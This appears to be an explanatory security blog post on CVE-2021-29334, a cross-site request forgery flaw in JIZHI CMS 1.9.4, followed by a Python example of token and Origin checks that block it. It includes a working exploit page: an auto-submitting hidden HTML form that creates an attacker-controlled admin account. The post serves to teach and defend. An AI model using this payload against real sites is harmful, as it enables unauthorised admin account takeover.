JIZHI CMS is a content management system used mainly in Chinese-speaking communities for creating and managing websites easily. In April 2021, a Cross-Site Request Forgery (CSRF) vulnerability was discovered in JIZHI CMS version 1.9.4 (CVE-2021-29334). This bug could let an attacker add a new admin account by tricking a logged-in admin into clicking a malicious link or visiting a specially crafted website. This post takes you through how the vulnerability works, gives you code examples, and shares steps to stay secure.

What is CSRF?

Let’s start simple. CSRF means "Cross-Site Request Forgery." Basically, an attacker tricks your browser into sending a request to a website where you’re already logged in—like your CMS admin page. If that site’s defenses are weak, the attacker’s request acts as if it came from you.

Think of it like someone sneaking a forged check into the stack of checks you’re signing—you may have no idea what just happened, but your signature is on it.

The JIZHI CMS 1.9.4 Bug

This CSRF vulnerability means that anyone who can lure a logged-in admin user onto a page they control can make that admin's browser send a request to admin.php/Admin/adminadd.html, creating a new admin account.

Why did it happen?

JIZHI CMS 1.9.4 did not have anti-CSRF protections (like CSRF tokens) on the admin add page (/admin.php/Admin/adminadd.html). So, a request from anywhere was accepted without checking if it was a legitimate admin action.

How Can an Attacker Exploit This?

Imagine a logged-in JIZHI CMS admin is browsing the web. The attacker sets up a malicious webpage with hidden code (like a malicious HTML form), and tricks the admin into opening it (e.g., through an email or a forum post).

When the admin loads that page, their browser silently sends a POST request to JIZHI CMS, adding a new admin user—invisible to the victim!

Let's look at a real exploit. The attacker hosts the following HTML code somewhere:

<!-- Exploit page: admin_add.html -->
<html>
  <body>
    <form id="csrf_form" action="http://victim.com/admin.php/Admin/adminadd.html" method="POST">
      <input type="hidden" name="username" value="eviladmin">
      <input type="hidden" name="password" value="SuperStrongPass123">
      <input type="hidden" name="usergroup" value="1"> <!-- 1 usually means admin -->
    </form>
    <script>
      document.getElementById('csrf_form').submit();
    </script>
    <!-- When a logged-in admin visits this page, a new admin user is created! -->
  </body>
</html>

The form is invisibly submitted when the page loads. If the page is requested by someone who is already authenticated on the JIZHI CMS panel, the POST request goes through as if it were an intentional request, adding a new admin named "eviladmin."

How to Prevent It?

CSRF bugs are old, and the fix is old too! To stop CSRF attacks, websites use a “CSRF token”—a random value put in every form and checked on submission. If the value is missing or wrong, the request is denied.
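The synchronizer-token fix in code, as an added Python example that is not JIZHI CMS code or its actual patch: the session issues a random token, the admin-add form embeds it as a hidden field, and the handler rejects any state-changing request whose token does not match, with an Origin-header check as a second layer. The `Session`/`Request` classes, the `__token__` field name and the `http://attacker.example` origin are constructed for this example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Constructed stand-ins for the CMS's session and request objects (not JIZHI CMS code).
@dataclass
class Session:
    user_id: int
    # One random token per login session, never derived from anything an attacker can guess.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))

@dataclass
class Request:
    method: str
    path: str
    form: Dict[str, str]
    origin: Optional[str] = None  # value of the browser's Origin header, if sent

SITE_ORIGIN = "http://victim.com"      # host used in the exploit page above
TOKEN_FIELD = "__token__"              # hidden-field name chosen for this example

def render_admin_add_form(session: Session) -> str:
    """Embed the session-bound token in the admin-add form as a hidden field."""
    return (
        '<form action="/admin.php/Admin/adminadd.html" method="POST">\n'
        f'  <input type="hidden" name="{TOKEN_FIELD}" value="{session.csrf_token}">\n'
        '  <input name="username"> <input name="password" type="password">\n'
        '</form>'
    )

def csrf_check(request: Request, session: Session) -> Tuple[bool, str]:
    """Return (accepted, reason). Only state-changing methods are checked."""
    if request.method not in ("POST", "PUT", "PATCH", "DELETE"):
        return True, "safe method"
    # Defence in depth: a form auto-submitted from another site carries that site's Origin.
    if request.origin is not None and request.origin != SITE_ORIGIN:
        return False, "origin mismatch: " + request.origin
    submitted = request.form.get(TOKEN_FIELD, "")
    # Constant-time comparison on bytes so the token cannot be recovered via timing.
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "token ok"

def handle_admin_add(request: Request, session: Session) -> str:
    """The patched handler: refuse the request before touching the admin table."""
    accepted, reason = csrf_check(request, session)
    if not accepted:
        return "403 Forbidden (" + reason + ")"
    return "201 Created admin " + request.form["username"]
```

Run against the auto-submitted form from the exploit page above, the request carries no token and a foreign Origin, so it is refused before any account is written.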

Proof-of-Concept Video (for reference)

- YouTube - CVE-2021-29334 Jizhi CMS CSRF PoC by Yingzhi Mao

Official References

- NVD Entry on CVE-2021-29334
- CVE Details - Jizhi CMS 1.9.4 CSRF vulnerability

Conclusion

CVE-2021-29334 is a textbook case of what happens when a CMS forgets to add anti-CSRF defenses. Always make sure your content management systems are up to date, and use good security practices both as a developer (using CSRF tokens) and as an admin (not clicking suspicious links). If you use JIZHI CMS, update it or patch it today!

Timeline

Published on: 11/23/2022 20:15:00 UTC
Last modified on: 11/28/2022 19:39:00 UTC